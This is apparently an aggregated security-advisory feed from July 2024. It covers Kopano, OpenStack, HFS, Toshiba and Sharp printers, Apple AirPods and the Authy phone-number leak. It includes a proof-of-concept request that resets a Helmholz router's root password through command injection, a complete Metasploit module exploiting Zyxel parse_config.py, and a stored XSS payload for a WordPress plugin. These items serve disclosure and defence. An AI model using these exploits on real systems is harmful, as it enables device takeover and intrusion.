Ubuntu Security Notice 6876-1 - It was discovered that Kopano Core allowed out-of-bounds access. An attacker could use this issue to expose private information. This issue only affected Ubuntu 18.04 LTS. It was discovered that Kopano Core allowed possible authentication with expired passwords. An attacker could use this issue to bypass authentication.

==========================================================================  
Ubuntu Security Notice USN-6876-1  
July 04, 2024

kopanocore vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in Kopano Core.

Software Description:  
- kopanocore: Complete and feature rich groupware solution

Details:

It was discovered that Kopano Core allowed out-of-bounds access. An  
attacker could use this issue to expose private information. This issue  
only affected Ubuntu 18.04 LTS. (CVE-2019-19907)

It was discovered that Kopano Core allowed possible authentication  
with expired passwords. An attacker could use this issue to bypass  
authentication. (CVE-2022-26562)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
   kopano-archiver                 8.7.0-7.1ubuntu10.1  
   kopano-contacts                 8.7.0-7.1ubuntu10.1  
   kopano-dagent                   8.7.0-7.1ubuntu10.1  
   kopano-gateway                  8.7.0-7.1ubuntu10.1  
   kopano-ical                     8.7.0-7.1ubuntu10.1  
   kopano-libs                     8.7.0-7.1ubuntu10.1  
   kopano-monitor                  8.7.0-7.1ubuntu10.1  
   kopano-server                   8.7.0-7.1ubuntu10.1  
   kopano-spooler                  8.7.0-7.1ubuntu10.1  
   kopano-utils                    8.7.0-7.1ubuntu10.1  
   php-mapi                        8.7.0-7.1ubuntu10.1  
   python3-mapi                    8.7.0-7.1ubuntu10.1

Ubuntu 20.04 LTS  
   kopano-archiver                 8.7.0-7ubuntu1.1  
   kopano-contacts                 8.7.0-7ubuntu1.1  
   kopano-dagent                   8.7.0-7ubuntu1.1  
   kopano-gateway                  8.7.0-7ubuntu1.1  
   kopano-ical                     8.7.0-7ubuntu1.1  
   kopano-libs                     8.7.0-7ubuntu1.1  
   kopano-monitor                  8.7.0-7ubuntu1.1  
   kopano-server                   8.7.0-7ubuntu1.1  
   kopano-spooler                  8.7.0-7ubuntu1.1  
   kopano-utils                    8.7.0-7ubuntu1.1  
   php-mapi                        8.7.0-7ubuntu1.1  
   python3-mapi                    8.7.0-7ubuntu1.1

Ubuntu 18.04 LTS  
   kopano-archiver                 8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   kopano-contacts                 8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   kopano-dagent                   8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   kopano-gateway                  8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   kopano-ical                     8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   kopano-libs                     8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   kopano-monitor                  8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   kopano-server                   8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   kopano-spooler                  8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   kopano-utils                    8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   php-mapi                        8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro  
   python-mapi                     8.5.5-0ubuntu1+esm1  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6876-1   
<https://ubuntu.com/security/notices/USN-6876-1>  
   CVE-2019-19907, CVE-2022-26562

Package Information:  
https://launchpad.net/ubuntu/+source/kopanocore/8.7.0-7.1ubuntu10.1   
<https://launchpad.net/ubuntu/+source/kopanocore/8.7.0-7.1ubuntu10.1>  
https://launchpad.net/ubuntu/+source/kopanocore/8.7.0-7ubuntu1.1   
<https://launchpad.net/ubuntu/+source/kopanocore/8.7.0-7ubuntu1.1>

Ubuntu Security Notice USN-6876-1

An issue was discovered in OpenStack Cinder through 24.0.0, Glance before 28.0.2, and Nova before 29.0.3. Arbitrary file access can occur via custom QCOW2 external data. By supplying a crafted QCOW2 image that references a specific data file path, an authenticated user may convince systems to return a copy of that file's contents from the server, resulting in unauthorized access to potentially sensitive data. All Cinder and Nova deployments are affected; only Glance deployments with image conversion enabled are affected.

**OpenStack Cinder, Glance, and Nova vulnerable to arbitrary file access**

Moderate severity GitHub Reviewed Published Jul 5, 2024 to the GitHub Advisory Database • Updated Jul 8, 2024

GHSA-r4v4-w9pv-6fph: OpenStack Cinder, Glance, and Nova vulnerable to arbitrary file access

rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

**rejetto HFS vulnerable to OS Command Execution by remote authenticated users**

Critical severity GitHub Reviewed Published Jul 5, 2024 to the GitHub Advisory Database • Updated Jul 8, 2024

GHSA-5f4x-hwv2-w9w2: rejetto HFS vulnerable to OS Command Execution by remote authenticated users

Helmholz Industrial Router REX100 and MBConnectline mbNET.mini versions 2.2.11 and below suffer from a command injection vulnerability.

CyberDanube Security Research 20240703-0  
-------------------------------------------------------------------------------  
                title| Authenticated Command Injection  
              product| Helmholz Industrial Router REX100  
                     | MBConnectline mbNET.mini  
   vulnerable version| <= 2.2.11  
        fixed version| 2.2.13  
           CVE number| CVE-2024-5672  
               impact| High  
             homepage| https://www.helmholz.de/  
                     | https://mbconnectline.com/  
                found| 2024-05-08  
                   by| S. Dietz (Office Vienna)  
                     | CyberDanube Security Research  
                     | Vienna | St. Pölten  
                     |  
                     | https://www.cyberdanube.com  
-------------------------------------------------------------------------------

Vendor description  
-------------------------------------------------------------------------------  
"Helmholz is your specialist when it comes to sophisticated products for your  
automation projects. With current, clever system solutions from Helmholz, the  
high demands placed on industrial networks in times of increasing automation  
can be met both reliably and efficiently - including a high level of operating  
convenience. The broad product spectrum ranges from a decentralized I/O system  
to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT  
remote machine access."

Source: https://www.helmholz.de/en/company/about-helmholz/

Vulnerable versions  
-------------------------------------------------------------------------------  
Helmholz Industrial Router REX100 <= 2.2.11  
MBConnectline mbNET.mini <= 2.2.11

Vulnerability overview  
-------------------------------------------------------------------------------  
1) Authenticated Command Injection (CVE-2024-5672)  
A command injection was identified on the webserver. This vulnerability can  
only be exploited if a user is authenticated on the web interface. This way,  
an attacker can invoke commands and is able to get full control over the whole  
device.

Proof of Concept  
-------------------------------------------------------------------------------  
1) Authenticated Command Injection (CVE-2024-5672)  
The following GET request changes the password for the root user and returns  
the process list of the device.

-------------------------------------------------------------------------------  
GET /cgi-bin/ping;echo$IFS'root:password'|chpasswd;ps;.sh HTTP/1.1  
Host: 192.168.25.11  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Authorization: Basic aGVsbWhvbHo6cm91dGVy  
Connection: close  
Upgrade-Insecure-Requests: 1

-------------------------------------------------------------------------------  
HTTP/1.0 200 OK  
This is haserl version 0.8.0  
This program runs as a cgi interpeter, not interactively.  
Bug reports to: Nathan Angelacos <nangel@users.sourceforge.net>

Password for 'root' changed  
  PID USER       VSZ STAT COMMAND  
    1 root      2292 S    init  
    2 root         0 SW   [kthreadd]  
    3 root         0 SW   [ksoftirqd/0]  
    4 root         0 SW   [events/0]  
    5 root         0 SW   [khelper]  
    8 root         0 SW   [async/mgr]  
[...]

Solution  
-------------------------------------------------------------------------------  
Update to latest version: 2.2.13

Workaround  
-------------------------------------------------------------------------------  
None

Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends Helmholz customers to upgrade the firmware to the latest  
version available and to restrict network access to the management interface of  
the device.

Contact Timeline  
-------------------------------------------------------------------------------  
2024-05-15: Contacting Helmholz via psirt@helmholz.de.  
2024-05-15: Receiving security contact for MBConnectline.  
2024-05-21: Contact stated they are working on a fix.  
2024-06-13: Received advisory from contact and assigned CVE number.  
2024-07-01: Contact sends out final release date.  
2024-07-03: Coordinated release of advisory with CERT@VDE.

Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com

EOF S. Dietz / @2024

Helmholz Industrial Router REX100 / MBConnectline mbNET.mini 2.2.11 Command Injection

103 models of Toshiba Multi-Function Printers (MFP) are vulnerable to 40 different vulnerabilities including remote code execution, local privilege escalation, xml injection, and more.

Toshiba Multi-Function Printers 40 Vulnerabilities

This Metasploit module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series. The affected firmware versions depend on the device module, see this module's documentation for more details.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zyxel parse_config.py Command Injection',        'Description' => %q{          This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.          The affected firmware versions depend on the device module, see this module's documentation for more details.          Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.          If you run into any issues testing this in a real environment we kindly ask you raise an issue in          metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose        },        'Author' => [          'SSD Secure Disclosure technical team', # discovery          'jheysel-r7' # Msf module        ],        'References' => [          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],          [ 'CVE', '2023-33012']        ],        'License' => MSF_LICENSE,        'Platform' => ['linux', 'unix'],        'Privileged' => true,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [ 'Automatic Target', {}]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-01-24',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],          'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot        }      )    )    register_options(      [        OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),      ]    )  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js')    })    return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?    if res.code == 200      product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/)      version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/)      if product_match && version_match        product = product_match[1]        version = version_match[1]        if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||           (product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||           (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||           (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))          return CheckCode::Appears("Product: #{product}, Version: #{version}")        else          return CheckCode::Safe("Product: #{product}, Version: #{version}")        end      end    end    CheckCode::Unknown('Version and product info were unable to be determined.')  end  def on_new_session(session)    super    command_output = ''    # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs.    if session.type.to_s.eql? 'meterpreter'      newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\""      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")      command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\""    elsif session.type.to_s.eql? 'shell'      newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1"      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")      command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"    end    if command_output.include?('success')      print_good('The GRE interface was successfully removed.')    else      print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')    end  end  def exploit    # Command injection has a 0x14 byte length limit so keep the file name as small as possible.    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.    filename = rand_text_alpha(1)    payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"    command = payload.raw    command += ' '    command += <<~CMD      2>/var/log/ztplog 1>/var/log/ztplog      (sleep 10 && /bin/rm -rf #{payload_filepath}) &    CMD    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"    file_write_pload = "option proto vti\n"    file_write_pload += "option #{command};exit\n"    file_write_pload += "option name 1\n"    config = Base64.strict_encode64(file_write_pload)    data = { 'config' => config, 'fqdn' => "\x00" }    print_status('Attempting to upload the payload via QSR file write...')    file_write_res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),      'data' => data.to_s    })    unless file_write_res && !file_write_res.body.include?('ParseError: 0xC0DE0005')      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')    end    register_files_for_cleanup(payload_filepath)    print_good("File write was successful, uploaded: #{payload_filepath}")    cmd_injection_pload = "option proto gre\n"    cmd_injection_pload += "option name 0\n"    cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n"    cmd_injection_pload += "option netmask 24\n"    cmd_injection_pload += "option gateway 0\n"    cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"    cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"    config = Rex::Text.encode_base64(cmd_injection_pload)    data = { 'config' => config, 'fqdn' => "\x00" }    cmd_injection_res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),      'data' => data.to_s    })    # If the payload being used is for example cmd/unix/generic and not a payload spawning any kind of handler (bind or reverse)    # we can query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.    if payload_instance.connection_type == 'none'      cmd_output_res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')      })      if cmd_output_res&.body && !cmd_output_res.body.empty?        output = cmd_output_res.body.split("</head>\n<body>")[1]        output = output.split("</body>\n</html>")[0]        output = output.gsub("\n\n<br>", '')        output = output.gsub("[IPC]IPC result: 1\n", '')        print_good("Command output: #{output}")      else        print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py")      end    end    unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')    end  endend

Zyxel parse_config.py Command Injection

308 different models of Sharp Multi-Function Printers (MFP) are vulnerable to 18 different vulnerabilities including remote code execution, local file inclusion, credential disclosure, and more.

Sharp Multi-Function Printer 18 Vulnerabilities

WordPress Photo Gallery plugin version 1.8.26 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Photo Gallery Version 1.8.26 Stored XSS# Date: 2024-07-03# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://10web.io/plugins/wordpress-photo-gallery/# Version 1.8.26### Steps to Execute the Payload:1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 2. Write Distance between pictures place your payload**: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3`3. Click Update4. You will see the payload executed

WordPress Photo Gallery 1.8.26 Cross Site Scripting

Apple Security Advisory 06-25-2024-1 - AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8 address a spoofing vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPodsFirmware Update 6F8, and Beats Firmware Update 6F8AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, andBeats Firmware Update 6F8 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT214111.Apple maintains a Security Releases page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.BluetoothAvailable for: AirPods (2nd generation and later), AirPods Pro (allmodels), AirPods Max, Powerbeats Pro, and Beats Fit ProImpact: When your headphones are seeking a connection request to oneof your previously paired devices, an attacker in Bluetooth rangemight be able to spoof the intended source device and gain accessto your headphonesDescription: An authentication issue was addressed with improvedstate management.CVE-2024-27867: Jonas DreßlerFirmware updates are automatically delivered while your headphonesare paired with and in Bluetooth range of your iPhone, iPad, or Mac. You can check the firmware version of your wireless headphones inBluetooth settings on your device. On iPhone or iPad, go toSettings > Bluetooth. On Mac, go to System Settings > Bluetooth.Then tap the info button next to your headphones. Learn more about firmware updates for AirPods athttps://support.apple.com/106340Learn more about firmware updates for Beats athttps://support.apple.com/102368All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmZ7kCwACgkQX+5d1TXaIvqORhAAsEgfOmEzguP2GofB8A1mvP7Mz8qwG8vVhlmc3Z7XhH0yQegpN13aQ9g3kEsu5KAeUJuId8sSgLwVZlNfLD/UVhR4xRdNQaJ5gVs0HydPUxr95tU2zAMQz/1wdJvST6tBcd0mEw9Rsqh4L8YATkuicy2Rctc8aKcXoqKLDop3J1H7/htv6t8vPtgwr59IyfzGWKuiNSeOArWwtbv2pbi6angogTJ3a8NwDBFzLg4stqCnAqgzIeBO32Tm+JwSknrElCRzcACQmcGDEElaI6A3ZFA6lP78gCXtW48dosHv/SC9J9TXOLK5JIWCWNHjFr+R/8w4ZoPYs0JJ/KlP2o++wEA8ew4cd7JTIIpV8oMRkHfJUzgRnkSM+5s8ZKULVvinzrBn5BnINXhYcWNms4hHgUGuFqTeNWRrVpy3vDKidFFFZh0c4bbbWaIKRFDmZop4NpucgoOka9h+dbrm8/LLTd0KK+IF0dfFArn+zo5UbeDu3dao38pP6qwO6U+1lFco5HodFzLAmECbIlE6VPUfwPHDoB+BApuehkka/qB2gZFIm4qIGRSzrQgQ3OGyI/RqUKfHigTxrxo1GUtXeTnLLbhIfPv9MvMwgvgRqt36liMYvksl+I17mWdRiNihwvsfpV6VliBCQm05nPJkp25g0h8j+aZfg0IdXFgzYMq7PmI==DvD4-----END PGP SIGNATURE-----

Apple Security Advisory 06-25-2024-1

Authy users have been warned that their phone numbers have been obtained by cybercriminals that abused an unsecured API endpoint.

Twilio has warned users of the Authy multi-factor authentication (MFA) app about an incident in which cybercriminals may have obtained their phone numbers.

Twilio said the cybercriminals abused an unsecured Application Programming Interface (API) endpoint to verify the phone numbers of millions of Authy multi-factor authentication users.

Authy is an app that you install on your device which then produces a MFA code for you when logging into services.

The cybercriminals were able test the validity of an enormous list of phone numbers against the unsecured API endpoint. If the number was valid, the endpoint would return information about the associated accounts registered with Authy.

Twilio says it has seen no evidence of the attackers gaining access to Twilio’s systems or other sensitive data, but as a precaution it is asking all Authy users to update to the latest Android and iOS apps.

BleepingComputer notes that a threat actor named ShinyHunters leaked a CSV text file containing what they claim are 33 million phone numbers registered with the Authy service.

> “In late June, a threat actor named ShinyHunters leaked a CSV text file containing what they claim are 33 million phone numbers registered with the Authy service.”

In that post, ShinyHunters suggests that buyers combine the data set with those leaked in the Gemini or Nexo data breaches. Nexo is a crypto platform where users can buy, exchange, and store Bitcoin and other cryptocurrencies. Gemini is another cryptocurrency exchange which has suffered several breaches in the past years.

With matches between the data sets, a cybercriminal could engage in SIM-swapping or phishing attacks to steal the target’s cryptocurrencies.

If you are an Authy user we advise you to update at your earliest convenience and keep an eye out for any potential phishing messages.

**How to avoid being phished**

Remember that phishing messages will try to rush you into making a decision by setting an ultimatum or otherwise imposing a sense of urgency. Don’t let them rush you into an expensive mistake.

There are a few tell-tale signs for phishing mails:

1.  It asks you to update/fill in personal information.
2.  The URL on the email and the URL that displays when you hover over the link are different from one another.
3.  The “From” address is not the legitimate address, although it may be a close imitation.
4.  The formatting and design are different from what you usually receive from the impersonated brand.
5.  The email contains an attachment you weren’t expecting.

However, with the advancement of AI, phishing emails are getting more sophisticated. So if you have even a tiny amount of suspicion that something is phishy, don’t hesitate to confirm the source of the email through another method. The chances of losing your money are much smaller after a quick call asking “Did you send this?”

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Tag

#auth